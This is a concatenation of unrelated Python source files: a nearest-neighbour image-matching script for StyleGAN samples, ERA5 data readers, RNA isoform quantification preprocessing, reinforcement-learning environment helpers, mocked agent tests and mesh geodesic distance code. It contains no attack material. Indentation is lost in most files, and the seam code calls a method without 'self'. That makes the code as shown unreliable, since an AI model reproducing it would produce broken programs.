dstRootDir_NNmatchResult = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_256/fakes006209/NNmatchResult/'
dstImgName_NNmatchSheet = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_256/fakes006209/NNmatchResultSheet.png'
dstTxtName_matchDist = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_256/fakes006209/NNmatchDist.txt'
#"""
#"""
# parameters: only for 256x256:
im_size = 256
# note: this sample sheet is a 16x30 grid:
num_row = 16
num_col = 30
#"""
# Newly added: only used for MNIST dataset:
# binarize the images!
#biFlag = True # for MNIST dataset
biFlag = False # for other (RGB or grayscale) dataset
def dealWith_sampleSheet():
sampleSheet_img = cv2.imread(src_sampleSheetImg)
(sheet_img_height, sheet_img_width, ch) = sampleSheet_img.shape
    single_img_height = sheet_img_height//num_row # equals im_size
    single_img_width = sheet_img_width//num_col # equals im_size
# a list to store each image in the sampleSheet_img
sample_img_list = []
    # split the sampleSheet img into num_row*num_col single images:
for i in range(num_row):
for j in range(num_col):
start_row_pos = i*single_img_height
end_row_pos = (i+1)*single_img_height
start_col_pos = j*single_img_width
end_col_pos = (j+1)*single_img_width
single_sample_img = sampleSheet_img[start_row_pos:end_row_pos,start_col_pos:end_col_pos,:]
# Newly added:
if biFlag:
single_sample_img_gray = single_sample_img[:,:,0]
_,single_sample_img = cv2.threshold(single_sample_img_gray,127,255,cv2.THRESH_BINARY)
sample_img_list.append(single_sample_img)
return sample_img_list
def image_to_feature_vector(image):
# Note: the image is already resized to a fixed size.
# flatten the image into a list of raw pixel intensities:
return image.flatten()
def generateTrainSet(len_featVec, dim):
all_origin_img_vecs = [] # this is our feature space
all_origin_img_names = []
for (dirpath, dirnames, filenames) in os.walk(srcRootDir_originDataImg):
for filename in filenames:
if ".jpg" in filename or ".png" in filename:
print("------------------deal with---------------------")
print(filename)
origin_img = cv2.imread(srcRootDir_originDataImg+filename)
if biFlag:
origin_img = origin_img[:,:,0]
"""
                # NO need to do this here: the images are already at the target resolution!
origin_img_centCrop = my_center_crop(origin_img, min(origin_img.shape[0],origin_img.shape[1]))
# resize using linear interpolation:
origin_img_centCrop_resize = cv2.resize(origin_img_centCrop, dim)
"""
                # also convert it to a feature vector (no crop/resize needed, see note above):
                origin_img_vec = image_to_feature_vector(origin_img)
                assert(len(origin_img_vec)==len_featVec)
                all_origin_img_vecs.append(origin_img_vec)
all_origin_img_names.append(filename)
return (np.array(all_origin_img_vecs), all_origin_img_names)
def combine_matchingResult(match_img_list):
    # combine the match_img tiles into one sheet laid out like the sample sheet;
    # shape[:2] keeps this working for both grayscale (H, W) and color (H, W, C) tiles
    tile_shape = match_img_list[0].shape
    (single_img_height, single_img_width) = tile_shape[:2]
    match_img_sheet = np.zeros((single_img_height*num_row, single_img_width*num_col) + tile_shape[2:], dtype=np.uint8)
for i in range(num_row):
for j in range(num_col):
start_row_pos = i*single_img_height
end_row_pos = (i+1)*single_img_height
start_col_pos = j*single_img_width
end_col_pos = (j+1)*single_img_width
match_img_idx = i*num_col + j
            match_img_sheet[start_row_pos:end_row_pos, start_col_pos:end_col_pos] = match_img_list[match_img_idx]
# save this sheet
cv2.imwrite(dstImgName_NNmatchSheet, match_img_sheet)
return
def query_NN_wrapper(sample_img_list):
# this is a wrapper func!
# first, get the training set from original images:
len_featVec = len(image_to_feature_vector(sample_img_list[0]))
dim = (sample_img_list[0].shape[1],sample_img_list[0].shape[0])
trainSet_feats, all_origin_img_names = generateTrainSet(len_featVec, dim)
neigh = NearestNeighbors(n_neighbors=1) # radius=0.4
neigh.fit(trainSet_feats)
# then, query:
match_img_list = []
match_distance_strs = ''
for i in range(len(sample_img_list)):
single_sample_img = sample_img_list[i]
# get the query vector:
single_sample_img_vec = image_to_feature_vector(single_sample_img)
# NN to search:
match_distance, match_idx = neigh.kneighbors([single_sample_img_vec], 1, return_distance=True)
match_distance = match_distance[0][0]
match_idx = match_idx[0][0]
match_imgName = all_origin_img_names[match_idx]
        if biFlag:
            # grayscale path: keep the match 2D so cv2.hconcat pairs it with the 2D thresholded sample
            match_img = trainSet_feats[match_idx,:].reshape((dim[1],dim[0]))
        else:
            match_img = trainSet_feats[match_idx,:].reshape((dim[1],dim[0],3))
match_img_list.append(match_img)
# save the matching result:
im_h = cv2.hconcat([single_sample_img, match_img])
cv2.imwrite(dstRootDir_NNmatchResult+str(i+1)+'_'+match_imgName, im_h)
# newly added: also save the corresponding match_distance into txt file:
match_distance_strs += str(i+1)+'_'+match_imgName + ': match_distance = ' + str(match_distance) + '\n'
# also combine the match_img together into a corresponding sheet!
combine_matchingResult(match_img_list)
# newly added: also save the corresponding match_distance into txt file:
f = open(dstTxtName_matchDist, 'w')
f.write(match_distance_strs)
f.close()
return
if __name__ == '__main__':
# first, deal with the sample sheet:
sample_img_list = dealWith_sampleSheet()
#"""
# for debug: save the generated sample images to visualize:
for i in range(len(sample_img_list)):
single_sample_img = sample_img_list[i]
cv2.imwrite(dstRootDir_viewSampleSheetImgs+str(i+1)+'.png', single_sample_img)
#"""
    # finally, query each single_sample_img against the original dataset selected above;
# also, save the matching results:
query_NN_wrapper(sample_img_list)
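    # Hedged sanity check (an added suggestion, not in the original script): the
    # splitting above relies on integer division, so the configured grid should
    # divide the sheet exactly and each tile should equal im_size, e.g.:
    #   sheet = cv2.imread(src_sampleSheetImg)
    #   assert sheet.shape[0] % num_row == 0 and sheet.shape[1] % num_col == 0
    #   assert sheet.shape[0] // num_row == im_size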
| file: syft/frameworks/torch/fl/__init__.py | repo: Rishav1/PySyft | license: Apache-2.0 |
from .dataset import BaseDataset
from .dataset import FederatedDataset
from .dataloader import FederatedDataLoader
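# Usage note (hedged sketch, not part of the original file): the re-exports above
# give callers a single stable import path, e.g.
#   from syft.frameworks.torch.fl import BaseDataset, FederatedDataset, FederatedDataLoader
# instead of importing from the internal .dataset / .dataloader submodules.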
| file: PyML/utils/__init__.py | repo: ArjixWasTaken/PyML | license: MIT |
from PyML.utils.table import Table
| file: src/qrcode/pyqart/qr/ec/__init__.py | repo: lapinozz/ArtCoder | license: MIT |
from .rsencoder import RSEncoder
| file: src/ecmwf_models/era5/interface.py | repo: wpreimes/ecmwf_models | license: MIT |
# -*- coding: utf-8 -*-
"""
This module contains ERA5/ERA5-Land specific child classes of the netcdf
and grib base classes, that are used for reading all ecmwf products.
"""
from ecmwf_models.interface import ERANcImg, ERANcDs, ERAGrbImg, ERAGrbDs
from typing import Tuple, Optional
from typing_extensions import Literal
from pygeogrids.grids import CellGrid
# ERA5 products supported by the reader.
_supported_products = ['era5', 'era5-land']
def _assert_product(product: str) -> str:
if product not in _supported_products:
raise ValueError(f"Got product {product} but expected one of "
f"{_supported_products}")
return product
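# Tiny illustration of the guard above (hedged doctest-style sketch):
#   >>> _assert_product('era5')
#   'era5'
#   >>> _assert_product('era6')   # doctest: +SKIP
#   ValueError: Got product era6 but expected one of ['era5', 'era5-land']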
class ERA5NcImg(ERANcImg):
def __init__(self,
filename: str,
parameter: Optional[Tuple[str, ...]] = ("swvl1", "swvl2"),
product: Literal['era5', 'era5-land'] = 'era5',
subgrid: Optional[CellGrid] = None,
mask_seapoints: Optional[bool] = False,
array_1D: Optional[bool] = False,
):
"""
Reader for a single ERA5 netcdf image file.
Parameters
----------
filename: str
Path to the image file to read.
parameter: list or str, optional (default: ['swvl1', 'swvl2'])
Name of parameters to read from the image file.
product: str, optional (default: 'era5')
What era5 product, either era5 or era5-land.
subgrid: pygeogrids.CellGrid, optional (default: None)
Read only data for points of this grid and not global values.
mask_seapoints : bool, optional (default: False)
Read the land-sea mask to mask points over water and
set them to nan. This option needs the 'lsm' parameter to be
in the file!
array_1D: bool, optional (default: False)
Read data as list, instead of 2D array, used for reshuffling.
"""
super(ERA5NcImg, self).__init__(
filename=filename,
product=_assert_product(product),
parameter=parameter,
subgrid=subgrid,
mask_seapoints=mask_seapoints,
array_1D=array_1D,
)
class ERA5NcDs(ERANcDs):
"""
Reader for a stack of ERA5 netcdf image files.
Parameters
----------
root_path: str
Path to the image files to read.
parameter: list or str, optional (default: ('swvl1', 'swvl2'))
Name of parameters to read from the image file.
product: str, optional (default: 'era5')
What era5 product, either era5 or era5-land.
h_steps : list, optional (default: (0,6,12,18))
List of full hours to read images for.
subgrid: pygeogrids.CellGrid, optional (default: None)
Read only data for points of this grid and not global values.
mask_seapoints : bool, optional (default: False)
Read the land-sea mask to mask points over water and set them to nan.
This option needs the 'lsm' parameter to be in the file!
array_1D: bool, optional (default: False)
Read data as list, instead of 2D array, used for reshuffling.
"""
def __init__(
self,
root_path: str,
parameter: Tuple[str, ...] = ("swvl1", "swvl2"),
product: Literal['era5', 'era5-land'] = 'era5',
h_steps: Tuple[int, ...] = (0, 6, 12, 18),
subgrid: Optional[CellGrid] = None,
mask_seapoints: Optional[bool] = False,
array_1D: Optional[bool] = False,
):
super(ERA5NcDs, self).__init__(
root_path=root_path,
product=_assert_product(product),
parameter=parameter,
subgrid=subgrid,
h_steps=h_steps,
array_1D=array_1D,
mask_seapoints=mask_seapoints,
)
class ERA5GrbImg(ERAGrbImg):
def __init__(
self,
filename: str,
parameter: Optional[Tuple[str, ...]] = ("swvl1", "swvl2"),
subgrid: Optional[CellGrid] = None,
mask_seapoints: Optional[bool] = False,
array_1D=False,
):
"""
Reader for a single ERA5 grib image file.
Parameters
----------
filename: str
Path to the image file to read.
parameter: list or str, optional (default: ['swvl1', 'swvl2'])
Name of parameters to read from the image file.
subgrid: pygeogrids.CellGrid, optional (default: None)
Read only data for points of this grid and not global values.
mask_seapoints : bool, optional (default: False)
Read the land-sea mask to mask points over water and set
them to nan. This option needs the 'lsm' parameter to be in
the file!
array_1D: bool, optional (default: False)
Read data as list, instead of 2D array, used for reshuffling.
"""
super(ERA5GrbImg, self).__init__(
filename=filename,
product="era5",
parameter=parameter,
subgrid=subgrid,
mask_seapoints=mask_seapoints,
array_1D=array_1D,
)
class ERA5GrbDs(ERAGrbDs):
def __init__(
self,
root_path: str,
parameter: Tuple[str, ...] = ("swvl1", "swvl2"),
h_steps: Tuple[int, ...] = (0, 6, 12, 18),
product: Literal['era5', 'era5-land'] = "era5",
subgrid: Optional[CellGrid] = None,
mask_seapoints: Optional[bool] = False,
array_1D: Optional[bool] = False,
):
"""
        Reader for a stack of ERA5 grib image files.
Parameters
----------
root_path: str
Path to the image files to read.
parameter: list or str, optional (default: ['swvl1', 'swvl2'])
Name of parameters to read from the image file.
h_steps : list, optional (default: [0,6,12,18])
List of full hours to read images for.
product: str, optional (default: 'era5')
What era5 product, either era5 or era5-land.
subgrid: pygeogrids.CellGrid, optional (default: None)
Read only data for points of this grid and not global values.
mask_seapoints : bool, optional (default: False)
Read the land-sea mask to mask points over water and set them
to nan. This option needs the 'lsm' parameter to be in the file!
array_1D: bool, optional (default: False)
Read data as list, instead of 2D array, used for reshuffling.
"""
super(ERA5GrbDs, self).__init__(
root_path=root_path,
product=_assert_product(product),
parameter=parameter,
subgrid=subgrid,
h_steps=h_steps,
mask_seapoints=mask_seapoints,
array_1D=array_1D,
)
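# Hedged usage sketch (hypothetical paths, not part of the original module): the
# readers only need a location, the variables to load and the product name; all
# other arguments fall back to the defaults documented above.
def _example_readers():
    img = ERA5NcImg('/data/era5/2020/era5_20200101_0000.nc',
                    parameter=('swvl1',), product='era5')
    ds = ERA5NcDs('/data/era5', parameter=('swvl1', 'swvl2'),
                  product='era5-land', h_steps=(0, 12))
    return img, ds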
| file: encode_quantification/preprocess.py | repo: LRGASP/lrgasp-challenge-2-evaluation | license: MIT |
import base64
import io
import pandas as pd
import numpy as np
import time
import zipfile
import pickle
from app import cache
from library.k_values.main import get_kvalues_dict
from preprocess_util import *
@cache.memoize()
def load_data(contents):
return pd.read_csv(contents[0], sep='\t',header=None,skiprows=1, comment='#')
# content_type, content_string = contents.split(',')
# decoded = base64.b64decode(content_string)
# df = pd.read_csv(io.StringIO(decoded.decode('utf-8')), sep='\t',header=None)
# return df
@cache.memoize()
def load_zipped_data(contents):
if 'zip' in contents[0]:
list_of_df = []
method_names = []
with zipfile.ZipFile(contents[0]) as myzip:
list_of_files = myzip.namelist()
for path in list_of_files:
with myzip.open(path) as myfile:
list_of_df.append(pd.read_csv(myfile, sep='\t',skiprows=1,header=None))
method_names.append(path.split('.')[0])
return list_of_df,method_names
@cache.memoize()
def load_annotation(contents,is_long_read=True,K_value_selection='Condition_number'):
path = 'encode_quantification/library/k_value_dicts/'
if contents[0] == 'human':
with open('{}/lrgasp_gencode_v38_sirvs.pkl'.format(path),'rb') as f:
return pickle.load(f)
elif contents[0] == 'mouse':
with open('{}/lrgasp_gencode_vM27_sirvs.pkl'.format(path),'rb') as f:
return pickle.load(f)
elif contents[0] == 'ensembl_human':
with open('{}/Homo_sapiens.GRCh38.104.chr.pkl'.format(path),'rb') as f:
return pickle.load(f)
else:
with open(contents[0],'r') as f:
return get_kvalues_dict(io.StringIO(f.read()),is_long_read,K_value_selection)
# content_type, content_string = contents.split(',')
# decoded = base64.b64decode(content_string)
# return io.StringIO(decoded.decode('utf-8'))
@cache.memoize()
def preprocess_single_sample(list_of_contents,replicate_column,is_long_read=True,K_value_selection='Condition_number'):
estimated_df = load_data(list_of_contents[0]).set_index(0)[[replicate_column]]
estimated_df.index.name = 'isoform'
estimated_df.columns = ['estimated_abund']
kvalues_dict,num_exon_dict,isoform_length_dict,isoform_gene_dict = load_annotation(list_of_contents[1],is_long_read,K_value_selection)
if (list_of_contents[2] is not None):
true_expression_df = load_data(list_of_contents[2]).set_index(0)[[replicate_column]]
true_expression_df.index.name = 'isoform'
true_expression_df.columns = ['true_abund']
df = estimated_df.join(true_expression_df,on='isoform',how='inner').reset_index()
else:
raise Exception('No ground truth data is given')
anno_df = pd.DataFrame({'K_value':pd.Series(kvalues_dict),'num_exons':pd.Series(num_exon_dict),'isoform_length':pd.Series(isoform_length_dict),'gene':pd.Series(isoform_gene_dict)})
anno_df.index.name = 'isoform'
anno_df = anno_df.reset_index()
df = preprocess_single_sample_util(df, kvalues_dict,num_exon_dict,isoform_length_dict,isoform_gene_dict)
return df,anno_df
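# Hedged usage sketch (hypothetical file names, not part of the original module).
# Every upload is passed around as a one-element list holding its path; the
# annotation slot takes a bundled key ('human', 'mouse', 'ensembl_human') or a
# path to an annotation file:
def _example_single_sample_call():
    list_of_contents = [['estimates.tsv'], ['human'], ['ground_truth.tsv']]
    # replicate_column picks which abundance column of the TSV to evaluate
    return preprocess_single_sample(list_of_contents, replicate_column=1)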
@cache.memoize()
def preprocess_multi_sample_diff_condition(list_of_contents,ground_truth_given,is_long_read=True,K_value_selection='Condition_number'):
estimated_df = load_data(list_of_contents[0]).set_index(0)
kvalues_dict,num_exon_dict,isoform_length_dict,isoform_gene_dict = load_annotation(list_of_contents[1],is_long_read,K_value_selection)
if (ground_truth_given):
true_expression_df = load_data(list_of_contents[2]).set_index(0)
intersected_index = true_expression_df.index.intersection(estimated_df.index)
estimated_df = estimated_df.loc[intersected_index,:].reset_index()
true_expression_df = true_expression_df.loc[intersected_index,:].reset_index()
else:
estimated_df = estimated_df.reset_index()
true_expression_df = None
anno_df = pd.DataFrame({'K_value':pd.Series(kvalues_dict),'num_exons':pd.Series(num_exon_dict),'isoform_length':pd.Series(isoform_length_dict),'gene':pd.Series(isoform_gene_dict)})
anno_df.index.name = 'isoform'
anno_df = anno_df.reset_index()
df = preprocess_multi_sample_diff_condition_util(estimated_df,true_expression_df, kvalues_dict,num_exon_dict,isoform_length_dict,isoform_gene_dict)
return df,anno_df
@cache.memoize()
def preprocess_single_sample_multi_method(list_of_contents,replicate_column,is_long_read=True,K_value_selection='Condition_number'):
estimated_dfs,method_names = load_zipped_data(list_of_contents[0])
kvalues_dict,num_exon_dict,isoform_length_dict,isoform_gene_dict = load_annotation(list_of_contents[1],is_long_read,K_value_selection)
if (list_of_contents[2] is not None):
true_expression_df = load_data(list_of_contents[2]).set_index(0)[[replicate_column]]
true_expression_df.index.name = 'isoform'
true_expression_df.columns = ['true_abund']
else:
raise Exception('No ground truth data is given')
dfs = []
for estimated_df in estimated_dfs:
estimated_df = estimated_df.set_index(0)[[replicate_column]]
estimated_df.index.name = 'isoform'
estimated_df.columns = ['estimated_abund']
df = estimated_df.join(true_expression_df,on='isoform',how='inner').reset_index()
dfs.append(preprocess_single_sample_util(df, kvalues_dict,num_exon_dict,isoform_length_dict,isoform_gene_dict))
anno_df = pd.DataFrame({'K_value':pd.Series(kvalues_dict),'num_exons':pd.Series(num_exon_dict),'isoform_length':pd.Series(isoform_length_dict),'gene':pd.Series(isoform_gene_dict)})
anno_df.index.name = 'isoform'
anno_df = anno_df.reset_index()
return dfs,anno_df,method_names
@cache.memoize()
def preprocess_multi_sample_multi_method(list_of_contents,ground_truth_given,is_long_read=True,K_value_selection='Condition_number'):
estimated_dfs,method_names = load_zipped_data(list_of_contents[0])
kvalues_dict,num_exon_dict,isoform_length_dict,isoform_gene_dict = load_annotation(list_of_contents[1],is_long_read,K_value_selection)
if (ground_truth_given):
true_expression_df = load_data(list_of_contents[2]).set_index(0)
else:
true_expression_df = None
dfs = []
for estimated_df in estimated_dfs:
estimated_df = estimated_df.set_index(0)
if (ground_truth_given):
intersected_index = true_expression_df.index.intersection(estimated_df.index)
estimated_df = estimated_df.loc[intersected_index,:].reset_index()
temp_true_expression_df = true_expression_df.loc[intersected_index,:].reset_index()
dfs.append(preprocess_multi_sample_diff_condition_util(estimated_df,temp_true_expression_df, kvalues_dict,num_exon_dict,isoform_length_dict,isoform_gene_dict))
else:
estimated_df = estimated_df.reset_index()
dfs.append(preprocess_multi_sample_diff_condition_util(estimated_df,None, kvalues_dict,num_exon_dict,isoform_length_dict,isoform_gene_dict))
anno_df = pd.DataFrame({'K_value':pd.Series(kvalues_dict),'num_exons':pd.Series(num_exon_dict),'isoform_length':pd.Series(isoform_length_dict),'gene':pd.Series(isoform_gene_dict)})
anno_df.index.name = 'isoform'
anno_df = anno_df.reset_index()
return dfs,anno_df,method_names
# @cache.memoize()
# def calculate_statistics_multi_sample_same_condition(list_of_contents):
# df = preprocess_files_multi_sample_same_condition(list_of_contents)
# estimated_df = load_data(list_of_contents[0])
# if (list_of_contents[2] is not None):
# true_expression_df = load_data(list_of_contents[2])
# return get_multi_sample_same_conditon_metrics(estimated_df,true_expression_df,df)
# return []
# @cache.memoize()
# def preprocess_files_multi_sample_same_condition(list_of_contents):
# estimated_df = load_data(list_of_contents[0])
# annotation = load_annotation(list_of_contents[1])
# if (list_of_contents[2] is not None):
# true_expression_df = load_data(list_of_contents[2])
# df = preprocess_multi_sample_df_same_condition(estimated_df,true_expression_df,annotation)
# return df
| file: sys_simulator/a2c/parallel.py | repo: lbaiao/sys-simulator-2 | license: MIT |
import numpy as np
def step(args):
env = args[0]
agents = args[1]
a, b, c, d = env.step(agents)
c = c * np.ones(len(agents))
return a, b, c, d, env, agents
def unpack_multi_agent(x, n_envs, n_agents):
total = n_envs * n_agents
states, rewards, dones, _, envs, agents = zip(*x)
states = np.array(states).reshape(total, -1)
rewards = np.array(rewards).reshape(total, -1)
dones = np.array(dones).reshape(total, -1)
return states, rewards, dones, envs, agents
def unpack_multi_agent_test(x, n_envs, n_agents):
total = n_envs * n_agents
states, rewards, dones, _, envs, agents = zip(*x)
states = np.array(states).reshape(total, -1)
rewards = np.array(rewards)
dones = np.array(dones).reshape(total, -1)
return states, rewards, dones, envs, agents
def env_step(pool, envs, agents):
n_envs = len(envs)
n_agents = len(agents[0])
aux = pool.map(step, zip(envs, agents))
next_obs, reward, done, envs, agents = \
unpack_multi_agent(aux, n_envs, n_agents)
return next_obs, reward, done, envs, agents
def env_step_test(pool, envs, agents):
n_envs = len(envs)
n_agents = len(agents[0])
aux = pool.map(step, zip(envs, agents))
next_obs, reward, done, envs, agents = \
unpack_multi_agent_test(aux, n_envs, n_agents)
return next_obs, reward, done, envs, agents
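# Minimal sketch of the unpacking convention above (hedged; _StubEnv is a
# hypothetical stand-in whose step() returns per-agent states/rewards/dones, as
# the real environments are expected to):
class _StubEnv:
    def step(self, agents):
        n = len(agents)
        states = np.zeros((n, 3))          # one 3-dim observation per agent
        rewards = np.zeros(n)
        dones = np.zeros(n, dtype=bool)
        return states, rewards, dones, {}

def _demo_unpack(n_envs=2, n_agents=4):
    results = [step((_StubEnv(), list(range(n_agents)))) for _ in range(n_envs)]
    states, rewards, dones, envs, agents = unpack_multi_agent(results, n_envs, n_agents)
    return states.shape  # (n_envs * n_agents, 3)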
| file: src/test/cli/test_agent.py | repo: pebble/flotilla | license: MIT |
import unittest
from mock import patch, MagicMock
from flotilla.cli.agent import start_agent
ENVIRONMENT = 'test'
SERVICE = 'test-app'
REGION = 'us-east-1'
ELB = 'elb-1234'
class TestAgent(unittest.TestCase):
@patch('flotilla.cli.agent.get_queue')
@patch('flotilla.cli.agent.get_instance_id')
@patch('flotilla.cli.agent.DynamoDbTables')
@patch('flotilla.cli.agent.Manager')
@patch('flotilla.cli.agent.RepeatingFunc')
@patch('boto.ec2.elb.connect_to_region')
@patch('boto.dynamodb2.connect_to_region')
@patch('boto.kms.connect_to_region')
@patch('boto3.resource')
def test_start_agent_no_elb(self, resource, kms, dynamo, elb, repeat,
manager, tables, get_instance_id, get_queue):
get_queue.return_value = None
get_instance_id.return_value = 'i-123456'
start_agent(ENVIRONMENT, SERVICE, REGION, None, 0.1, 0.1)
dynamo.assert_called_with(REGION)
kms.assert_called_with(REGION)
elb.assert_not_called()
        self.assertEqual(2, repeat.call_count)
@patch('flotilla.cli.agent.get_instance_id')
@patch('flotilla.cli.agent.DynamoDbTables')
@patch('flotilla.cli.agent.FlotillaAgentDynamo')
@patch('flotilla.cli.agent.Manager')
@patch('flotilla.cli.agent.RepeatingFunc')
@patch('boto.ec2.elb.connect_to_region')
@patch('boto.dynamodb2.connect_to_region')
@patch('boto.kms.connect_to_region')
@patch('boto3.resource')
def test_start_agent_elb(self, resource, kms, dynamo, elb, repeat, manager,
agent_db, tables, get_instance_id):
get_instance_id.return_value = 'i-123456'
start_agent(ENVIRONMENT, SERVICE, REGION, ELB, 0.1, 0.1)
elb.assert_called_with(REGION)
@patch('flotilla.cli.agent.get_queue')
@patch('flotilla.cli.agent.get_instance_id')
@patch('flotilla.cli.agent.DynamoDbTables')
@patch('flotilla.cli.agent.FlotillaAgentDynamo')
@patch('flotilla.cli.agent.Manager')
@patch('flotilla.cli.agent.RepeatingFunc')
@patch('boto.ec2.elb.connect_to_region')
@patch('boto.dynamodb2.connect_to_region')
@patch('boto.kms.connect_to_region')
@patch('boto3.resource')
def test_start_agent_messaging(self, resource, kms, dynamo, elb, repeat,
manager, agent_db, tables, get_instance_id,
get_queue):
get_instance_id.return_value = 'i-123456'
get_queue.return_value = MagicMock()
start_agent(ENVIRONMENT, SERVICE, REGION, ELB, 0.1, 0.1)
        self.assertEqual(3, repeat.call_count)
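# Hedged convenience addition (not in the original file): allow running the tests
# directly with `python test_agent.py` as well as through a test runner.
if __name__ == '__main__':
    unittest.main()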
| file: src/seam/boundary/distance_calculation.py | repo: MahiroGoto/seam | license: MIT |
import math
from typing import Dict, Union
import numpy as np
from compas.geometry import Vector, Point, Rotation, Plane
from compas.datastructures import Mesh
from seam.utils import utils, primitive, parameters
from seam.Branch import discrete_curve, boundary_control
import igl
import logging
## logging settings ##
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
file_handler = logging.StreamHandler()
formatter = logging.Formatter('%(levelname)s : %(message)s')
file_handler.setFormatter(formatter)
logger.addHandler(file_handler)
########################
######################################
## calculating distance differences ##
class Differences:
def __init__(self, MESH, seam_vertex_keys_list):
self.mesh = MESH
self.svkl = seam_vertex_keys_list
self.seam_num = len(self.svkl)
# self.width_01 = width_01
## settings ##
self.distances_list = self.get_distances_list_from_every_boundary()
self.short_way, self.long_way, self.ave_way, self.way_list = self.get_short_long_ave_way_length_on_every_vertex()
self.gap_ratio = self.get_gap_ratio()
# ## results ##
# self.realm_dict = self.get_seam_realm_dict_from_vertex_geodesic()
#######################################################
## functions ##
def compute_geodesic_to_every_vertex(self, mesh, vertices_start):
v, f = mesh.to_vertices_and_faces()
v = np.array(v)
f = np.array(f)
vertices_target = np.arange(len(v)) # all vertices are targets
vstart = np.array(vertices_start)
distances = igl.exact_geodesic(v, f, vstart, vertices_target)
return distances
def compute_geodesic_from_start_to_target_vkeys(self, mesh, start_v_keys_list, target_v_keys_list):
v, f = mesh.to_vertices_and_faces()
v = np.array(v)
f = np.array(f)
vertices_start = np.array(start_v_keys_list)
vertices_target = np.array(target_v_keys_list)
distances = igl.exact_geodesic(v, f, vertices_start, vertices_target)
return distances
## get values ##
def get_distances_list_from_every_boundary(self):
distances_list = []
for seam_vkeys in self.svkl:
distances = list(compute_geodesic_to_every_vertex(self.mesh, seam_vkeys))
distances_list.append(distances)
return distances_list
## calculating ##
def get_short_long_ave_way_length_on_every_vertex(self):
# distances_list = get_distances_list_from_every_seams(mesh, seam_vertex_keys_list)
vkeys = self.mesh.vertices()
way_list = []
for vkey in vkeys:
vdis_list = [distances[vkey] for distances in self.distances_list]
vdis_list.sort()
d00 = vdis_list[0]
d01 = vdis_list[1]
way = d00 + d01
way_list.append(way)
temp_list = [way for way in way_list]
temp_list.sort()
short_way = temp_list[0]
long_way = temp_list[-1]
ave_way = sum(temp_list) / len(temp_list)
return short_way, long_way, ave_way, way_list
def get_gap_ratio(self):
gap_ratio = (self.long_way - self.short_way) / self.long_way
return gap_ratio
# #######################################################
# def get_seam_realm_dict_from_vertex_geodesic(self):
# realm_dict = {}
# for i in range(3):
# realm_dict["piece_0" + str(i)] = []
# vkeys = self.mesh.vertices()
# for vkey in vkeys:
# dist_list = [distances[vkey] for distances in self.distances_list]
# closest = min(dist_list)
# seam_number = dist_list.index(closest)
# realm_dict["piece_0" + str(seam_number)].append(vkey)
# return realm_dict
#
# def equal_differences(self, time):
# # if len(self.distances_list) <= 2:
# difs = [(d01 * time - d00 * (1 - time)) for d00, d01 in zip(self.distances_list[0], self.distances_list[1])]
# return difs
## for connection detail ##
def calculate_custom_differences_with_two_boundaries(self, base_boundary_num, time,
minValue=0.5,
frequency=2.5):
difs = []
distances_00 = self.distances_list[0]
distances_01 = self.distances_list[1]
for D_00, D_01, way in zip(distances_00, distances_01, self.way_list):
x = abs(self.long_way - way) / (self.long_way - self.short_way)
width = self.long_way * minValue
freq = frequency
alpha = freq * math.pi * x
a = minValue
y = ((1 - a) / 2) * math.cos(alpha) + ((a + 1) / 2)
if y > 1:
y = 1
elif y < a:
y = a
if base_boundary_num == 0:
dif = (D_01) * time - (D_00 * y) * (1 - time)
else:
dif = (D_00) * time - (D_01 * y) * (1 - time)
# value = width * math.cos(alpha) + width / 2
# if value > width:
# value = width
# elif value < 0:
# value = 0
# addv = value * (0.5 - abs(0.5 - time))
# ## get the difference value ##
# if base_boundary_num == 0:
# dif = ((D_01 + addv) * time - (D_00) * (1 - time))
# else:
# dif = ((D_00 + addv) * time - (D_01) * (1 - time))
difs.append(dif)
return difs
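    ## Worked check of the cosine envelope above (documentation added here, not
    ## in the original): y = ((1-a)/2)*cos(alpha) + (a+1)/2 swings between y = 1
    ## (cos = 1) and y = a (cos = -1), so after clamping the scaled distance is
    ## never shrunk below minValue times the raw distance. E.g. with a = 0.5:
    ##   cos = 1  -> y = 0.25 + 0.75 = 1.0
    ##   cos = -1 -> y = -0.25 + 0.75 = 0.5 = a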
# for d00, d01 in zip(self.distances_list[0], self.distances_list[1]):
# way = d00 + d01
# x = abs(self.long_way - way)
# y = abs(self.ave_way - way)
# check_value = abs(self.long_way - self.ave_way)
# value = width * math.cos((2.7 * math.pi / (self.long_way - self.short_way)) * x) + width / 2
# # value = value * (1 - 1 / (y + 1))
# if value >= width:
# value = width
# elif value < 0: value = 0
# else:
# value = value
# addv = value * (0.5 - abs(0.5 - time))
# dif00 = ((d01 + addv) * time - d00 * (1 - time))
# difs00.append(dif00)
# return difs00
# def custom_differences_01_second(self, time, width=70):
# """
# diftype == 1.2
# """
# # width = self.width_01
# difs01 = []
# time_ = time
# for d00, d01 in zip(self.distances_list[0], self.distances_list[1]):
# way = d00 + d01
# x = abs(self.long_way - way)
# y = abs(self.ave_way - way)
# check_value = abs(self.long_way - self.ave_way)
# value = 10 * width * math.cos((2 * math.pi / (self.long_way - self.short_way)) * x) - 1.5 * width
# # value = value * (1 - 1/(y+1))
# if value <= 0:
# value = 0
# elif value > width:
# value = width
# else:
# value = value
# addv = value * (0.5 - abs(0.5 - time))
# dif01 = (d01 - addv) * time - (d00) * (1 - time)
# difs01.append(dif01)
# return difs01
#
# ## for connection detail 2.0 ##
# def custom_differences_03_first(self, time, width=210, flat_ratio=0.2):
# """
# diftype == 3.1
# """
# difs00 = []
# for d00, d01 in zip(self.distances_list[0], self.distances_list[1]):
# way = d00 + d01
# check_value = abs(self.ave_way - way)
# l_value = abs(self.long_way - way)
# s_value = abs(self.short_way - way)
# wid = width
# if self.ave_way - way >= 0:
# ## define the short side ##
# value = wid * ((1/(s_value+1))**0.4) - wid * ((1/abs(self.short_way-self.ave_way))**0.4) * (1 + flat_ratio)
# else:
# ## define the long side ##
# value = wid * ((1/(l_value+1))**0.2) - wid * ((1/abs(self.long_way-self.ave_way))**0.2) * (1 + flat_ratio)
# if value < 0: value = 0
# addv = value * (0.5 - abs(0.5-time))
#
# dif = (d01 + addv/2)*time - (d00)*(1-time)
# difs00.append(dif)
# return difs00
#
# def custom_differences_03_second(self, time, width=210, flat_ratio=0.2):
# """
# diftype == 3.2
# """
# difs01 = []
# for d00, d01 in zip(self.distances_list[0], self.distances_list[1]):
# way = d00 + d01
# check_value = abs(self.ave_way - way)
